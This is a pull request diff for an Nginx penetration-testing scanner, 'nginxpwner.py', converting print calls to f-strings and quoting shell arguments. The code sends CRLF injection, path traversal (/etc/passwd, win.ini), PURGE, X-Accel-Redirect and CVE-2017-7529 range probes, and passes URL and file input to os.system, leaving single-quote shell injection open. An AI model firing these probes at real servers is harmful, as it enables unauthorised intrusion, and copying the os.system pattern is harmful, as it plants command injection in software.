### PR TITLE
Fixed bugs with special chars in URLs

### DIFF
--- a/nginxpwner.py
+++ b/nginxpwner.py
@@ -21,10 +21,10 @@ banner='''
 print(Fore.BLUE+banner)
 
 if len(sys.argv) != 3:
-    print(Fore.WHITE+"Usage: python3 nginxpwner.py https://example.com filewithexistingfolderpaths")
+    print(f"{Fore.WHITE}Usage: python3 nginxpwner.py https://example.com filewithexistingfolderpaths")
     sys.exit()
 if sys.argv[1].endswith("/"):
-    print(Fore.WHITE+"[?] Please provide the URL without the last slash")
+    print(f"{Fore.WHITE}[?] Please provide the URL without the last slash")
     sys.exit()
 
 url = sys.argv[1]
@@ -37,7 +37,7 @@ nginx_version = "https://github.com/nginx/nginx/releases"
 try:
   target_nginx_version = basereq.headers["Server"].split("/")[1]
 except:
-  print(Fore.RED+"No Server header found or invalid Server header. If you are sure that your target uses Nginx, it may happen either you are testing something built with NGINX or that a simple NGINX server has the server_tokens directive set to off. In any case, please use nginx-pwner-no-server-header.py")
+  print(f"{Fore.RED}No Server header found or invalid Server header. If you are sure that your target uses Nginx, it may happen either you are testing something built with NGINX or that a simple NGINX server has the server_tokens directive set to off. In any case, please use nginx-pwner-no-server-header.py")
   sys.exit()
 nginx_req = requests.get(nginx_version)
 html=nginx_req.text
@@ -45,37 +45,37 @@ soup = BeautifulSoup(html,'lxml')
 last_version =(soup.findAll('a', attrs={'href': re.compile("^/nginx/nginx/releases/tag")})[0].get('href')).split("-")[1]
 
 if version.parse(target_nginx_version) < version.parse(last_version):
-    print(Fore.RED+"[-] NGINX out of date, current version is: "+target_nginx_version+ " and last version is: "+last_version)
-    print(Fore.RED+"[-] All possible exploits will be printed now:")
-    os.system("searchsploit nginx "+str(target_nginx_version.split(".")[0]+"."+target_nginx_version.split(".")[1]))
-    print(Fore.MAGENTA+"[-] For the complete list of vulnerabilities check out: https://cve.mitre.org/cgi-bin/cvekey.cgi?keyword=nginx")
+    print(f"{Fore.RED}[-] NGINX out of date, current version is: {target_nginx_version} and last version is: {last_version}")
+    print(f"{Fore.RED}[-] All possible exploits will be printed now:")
+    os.system(f"searchsploit nginx '{str(target_nginx_version.split('.')[0]+'.'+target_nginx_version.split('.')[1])}'")
+    print(f"{Fore.MAGENTA}[-] For the complete list of vulnerabilities check out: https://cve.mitre.org/cgi-bin/cvekey.cgi?keyword=nginx")
 else:
-    print(Fore.GREEN+"[+] NGINX version is up to date")
-print(Fore.BLUE+"[?] If the tool reveals the nginx.conf file this is probably because there is no root directive in the nginx.conf file. Get the contents of the file and use https://github.com/yandex/gixy to find more misconfigurations")
-print(Fore.WHITE+"\n\n")
-os.system("gobuster dir --url "+url+" -w ./nginx.txt --wildcard --random-agent")
+    print(f"{Fore.GREEN}[+] NGINX version is up to date")
+print(f"{Fore.BLUE}[?] If the tool reveals the nginx.conf file this is probably because there is no root directive in the nginx.conf file. Get the contents of the file and use https://github.com/yandex/gixy to find more misconfigurations")
+print(f"{Fore.WHITE}\n\n")
+os.system(f"gobuster dir --url '{url}' -w ./nginx.txt --wildcard --random-agent")
 print("\n")
 uri_crlf_test= requests.get(url+"/%0d%0aDetectify:%20clrf")
 if "Detectify" in uri_crlf_test.headers:
-    print(Fore.RED+"[-] CRLF injection found via $uri or $document_uri parameter with payload: %0d%0aDetectify:%20crlf as URI. If you found any 401 or 403 status code, try injecting X-Accel-Redirect headers in the response or even X-Sendfile")
+    print(f"{Fore.RED}[-] CRLF injection found via $uri or $document_uri parameter with payload: %0d%0aDetectify:%20crlf as URI. If you found any 401 or 403 status code, try injecting X-Accel-Redirect headers in the response or even X-Sendfile")
 else:
-    print(Fore.GREEN+"[+] No CRLF via common misconfiguration found")
+    print(f"{Fore.GREEN}[+] No CRLF via common misconfiguration found")
 #p = subprocess.Popen('curl -IL -X PURGE -D - "'+url+'"/* | grep HTTP', shell=True, stdout=subprocess.PIPE)
 #output, _ = p.communicate()
 purgemethod=requests.request("PURGE", url+"/*", allow_redirects=True)
 #print(purgemethod.text+str(purgemethod.headers)+str(purgemethod.status_code))
 if purgemethod.status_code == 204:
-    print(Fore.RED+"[-] Possibly misconfigured PURGE HTTP method (purges the web cache), test this HTTP method manually")
+    print(f"{Fore.RED}[-] Possibly misconfigured PURGE HTTP method (purges the web cache), test this HTTP method manually")
 else:
-    print(Fore.GREEN+"[+] No signs of misconfigured PURGE HTTP method")
+    print(f"{Fore.GREEN}[+] No signs of misconfigured PURGE HTTP method")
 
 headers={"Referer": "bar"}
 variable_leakage = requests.get(url+"/foo$http_referer", headers=headers)
 if "foobar" in variable_leakage.text:
-    print(Fore.RED+"[-] Variable leakage found in NGINX via Referer header")
-    print(Fore.RED+"[-] Test other variables like $realpath_root, $nginx_version")
+    print(f"{Fore.RED}[-] Variable leakage found in NGINX via Referer header")
+    print(f"{Fore.RED}[-] Test other variables like $realpath_root, $nginx_version")
 else:
-    print(Fore.GREEN+"[+] No variable leakage misconfiguration found")
+    print(f"{Fore.GREEN}[+] No variable leakage misconfiguration found")
 #merge-slashes set to off
 merge_slashes_req = requests.get(url+"///")
 merge_slashes_etc_passwd_old = requests.get(url+ "///../../../../../etc/passwd")
@@ -84,16 +84,16 @@ merge_slashes_winini_old = requests.get(url+ "///../../../../../win.ini")
 merge_slashes_winini = requests.get(url+ "//////../../../../../../win.ini")
  
 if basereq.status_code == merge_slashes_req and basereq.text == merge_slashes_req.text:
-    print(Fore.RED+"[-] Merge slashes set to off. This is useful in case we find an LFI")
+    print(f"{Fore.RED}[-] Merge slashes set to off. This is useful in case we find an LFI")
 if merge_slashes_etc_passwd.status_code == 200 or merge_slashes_etc_passwd_old.status_code ==200:
-    print(Fore.RED+"[-] Possible path traversal vulnerability found for insecure merge_slashes setting")
-    print(Fore.RED+"[-] Try this to URIs manually: ///../../../../../etc/passwd and //////../../../../../../etc/passwd")
+    print(f"{Fore.RED}[-] Possible path traversal vulnerability found for insecure merge_slashes setting")
+    print(f"{Fore.RED}[-] Try this to URIs manually: ///../../../../../etc/passwd and //////../../../../../../etc/passwd")
 elif merge_slashes_winini.status_code == 200 or merge_slashes_winini_old.status_code ==200:
-    print(Fore.RED+"[-] Possible path traversal vulnerability found for insecure merge_slashes setting")
-    print(Fore.RED+"[-] Try this to URIs manually: ///../../../../../win.ini and //////../../../../../../win.ini")
+    print(f"{Fore.RED}[-] Possible path traversal vulnerability found for insecure merge_slashes setting")
+    print(f"{Fore.RED}[-] Try this to URIs manually: ///../../../../../win.ini and //////../../../../../../win.ini")
 else:
-    print(Fore.GREEN+"[+] No merge_slashes misconfigurations found\n")
-print(Fore.BLUE+"[?] Testing hop-by-hop headers"+Fore.WHITE+"\n")
+    print(f"{Fore.GREEN}[+] No merge_slashes misconfigurations found\n")
+print(f"{Fore.BLUE}[?] Testing hop-by-hop headers{Fore.WHITE}\n")
 onetwosevendict={}
 localhostdict={}
 oneninetwodict={}
@@ -171,7 +171,7 @@ for x, y in tenzerozerodict.items():
 if counter == 0:
    print("No relevant results for 10.0.0.1 tests")
 
-print("\n"+Fore.BLUE+"[?] To test Raw backend reading responses, please make a request with the following contents to Nginx. In case the response is interesting: https://book.hacktricks.xyz/pentesting/pentesting-web/nginx#raw-backend-response-reading")
+print(f"\n{Fore.BLUE}[?] To test Raw backend reading responses, please make a request with the following contents to Nginx. In case the response is interesting: https://book.hacktricks.xyz/pentesting/pentesting-web/nginx#raw-backend-response-reading")
 a='''
 GET /? XTTP/1.1
 Host: 127.0.0.1
@@ -191,13 +191,13 @@ elif "X-Powered-By" in basereq.headers:
     if "php" in basereq.headers["X-Powered-By"]:
         print(Fore.GREEN+ "[+] The site is using PHP")
 
-print(Fore.YELLOW+"[!] If the site uses PHP check for this misconfig: https://book.hacktricks.xyz/pentesting/pentesting-web/nginx#script_name and also check this: https://github.com/jas502n/CVE-2019-11043. A last advice, if you happen to have a restricted file upload and you can reach the file you uploaded try making a request to <filename>/whatever.php,and if it executes PHP code it is because the PHP-FastCGI directive is badly configured (this normally only works for older PHP versions)")
+print(f"{Fore.YELLOW}[!] If the site uses PHP check for this misconfig: https://book.hacktricks.xyz/pentesting/pentesting-web/nginx#script_name and also check this: https://github.com/jas502n/CVE-2019-11043. A last advice, if you happen to have a restricted file upload and you can reach the file you uploaded try making a request to <filename>/whatever.php,and if it executes PHP code it is because the PHP-FastCGI directive is badly configured (this normally only works for older PHP versions)")
 print("\n")
-print(Fore.BLUE+"[?] Executing Kyubi to check for path traversal vulnerabilities via misconfigured NGINX alias directive"+Fore.WHITE)
+print(f"{Fore.BLUE}[?] Executing Kyubi to check for path traversal vulnerabilities via misconfigured NGINX alias directive{Fore.WHITE}")
 pathlist = open(existingfolderpathlist, "r")
 pathlines = pathlist.readlines()
 for pathline in pathlines:
-    os.system("kyubi "+url+"/"+pathline.strip())
+    os.system(f"kyubi '{url}/{pathline.strip()}'")
 pathlist.close()
 
 pathlist2 = open(existingfolderpathlist, "r")
@@ -210,33 +210,33 @@ for pathline in pathlines:
         accel = {"X-Accel-Redirect" : "/"+pathline.strip()}
         accelreq = requests.get(url+"/randompath",headers=accel)
         if accelreq.status_code != makereq.status_code:
-            print(Fore.RED+"[-] Different status code when accessing "+pathline.strip()+" using a randompath in the URI, but the this path in the X-Accel-Redirect header")
+            print(f"{Fore.RED}[-] Different status code when accessing {pathline.strip()} using a randompath in the URI, but the this path in the X-Accel-Redirect header")
         else:
-            print(Fore.GREEN+"[+] No difference found with X-Accel-Redirect when trying to access "+pathline)
+            print(f"{Fore.GREEN}[+] No difference found with X-Accel-Redirect when trying to access {pathline}")
 if counterunauthorised == 0:
-    print(Fore.GREEN+"\n[+] No X-Accel-Redirect bypasses found using it as request header")
+    print(f"{Fore.GREEN}\n[+] No X-Accel-Redirect bypasses found using it as request header")
 pathlist2.close()
 
 pathlist3 = open(existingfolderpathlist, "r")
 pathlines = pathlist3.readlines()
-print(Fore.CYAN+"\n[?] Testing all provided paths to check to CRLF injection. This is specially interesting if the site uses S3 buckets or GCP to host files")
+print(f"{Fore.CYAN}\n[?] Testing all provided paths to check to CRLF injection. This is specially interesting if the site uses S3 buckets or GCP to host files")
 for pathline in pathlines:
-    uri_crlf_test= requests.get(url+"/"+pathline.strip()+"%0d%0aDetectify:%20clrf")
+    uri_crlf_test= requests.get(f"{url}/{pathline.strip()}%0d%0aDetectify:%20clrf")
 if "Detectify" in uri_crlf_test.headers:
-    print(Fore.RED+"[-] CRLF injection found via in URL:"+url+"/"+pathline.strip()+" payload: %0d%0aDetectify:%20crlf in URI. If you found any 401 or 403 status code, try injecting X-Accel-Redirect headers in the response or even X-Sendfile")
+    print(f"{Fore.RED}[-] CRLF injection found via in URL:{url}/{pathline.strip()} payload: %0d%0aDetectify:%20crlf in URI. If you found any 401 or 403 status code, try injecting X-Accel-Redirect headers in the response or even X-Sendfile")
 
-print(Fore.CYAN+"\n[?] Testing for common integer overflow vulnerability in nginx's range filter module")
+print(f"{Fore.CYAN}\n[?] Testing for common integer overflow vulnerability in nginx's range filter module")
 
 def send_http_request(url, headers={}, timeout=8.0):
     httpResponse   = requests.get(url, headers=headers, timeout=timeout)
     httpHeaders    = httpResponse.headers
 
-    print("status: %s: Server: %s", httpResponse.status_code, httpHeaders.get('Server', ''))
+    print(f"status: {httpResponse.status_code}: Server: {httpHeaders.get('Server', '')}")
     return httpResponse
 
 
 def exploit(url):
-    print("target: %s", url)
+    print(f"target: {url}")
     httpResponse   = send_http_request(url)
 
     content_length = httpResponse.headers.get('Content-Length', 0)
@@ -245,12 +245,12 @@ def exploit(url):
 
     httpResponse   = send_http_request(url, headers={ 'Range': content_length })
     if httpResponse.status_code == 206 and "Content-Range" in httpResponse.text:
-        print(Fore.RED+"\n[+] Vulnerable to CVE-2017-7529, use this to exploit https://github.com/souravbaghz/Scanginx/blob/master/dumper.py")
+        print(f"{Fore.RED}\n[+] Vulnerable to CVE-2017-7529, use this to exploit https://github.com/souravbaghz/Scanginx/blob/master/dumper.py")
     else:
-        print(Fore.GREEN+"\n[+] Non vulnerable")
+        print(f"{Fore.GREEN}\n[+] Non vulnerable")
 
 exploit(url)
 
-print(Fore.CYAN+"\n[?] If the site uses Redis, please do check out: https://labs.detectify.com/2021/02/18/middleware-middleware-everywhere-and-lots-of-misconfigurations-to-fix/")
+print(f"\n\n{Fore.CYAN}\n[?] If the site uses Redis, please do check out: https://labs.detectify.com/2021/02/18/middleware-middleware-everywhere-and-lots-of-misconfigurations-to-fix/")
 
-print("\n\n"+Fore.CYAN+ "[*] More things that you need to test by hand: CORS misconfiguration (ex: bad regex) with tools like Corsy, Host Header injection, Web cache poisoning & Deception in case NGINX is being for caching as well, HTTP request smuggling both normal request smuggling and https://bertjwregeer.keybase.pub/2019-12-10%20-%20error_page%20request%20smuggling.pdf. As well as the rest of typical web vulnerabilities")
+print(f"\n\n{Fore.CYAN}[*] More things that you need to test by hand: CORS misconfiguration (ex: bad regex) with tools like Corsy, Host Header injection, Web cache poisoning & Deception in case NGINX is being for caching as well, HTTP request smuggling both normal request smuggling and https://bertjwregeer.keybase.pub/2019-12-10%20-%20error_page%20request%20smuggling.pdf. As well as the rest of typical web vulnerabilities")


### PR DESCRIPTION
Fixed bug I was having with special chars in URLs by putting the command arguments in single quotes. This pull request doesn't resolve issues with paths that have single quotes in them but I think thats probably rare.
Fixed some broken print statements
Changed things to use fstrings (cos they cool)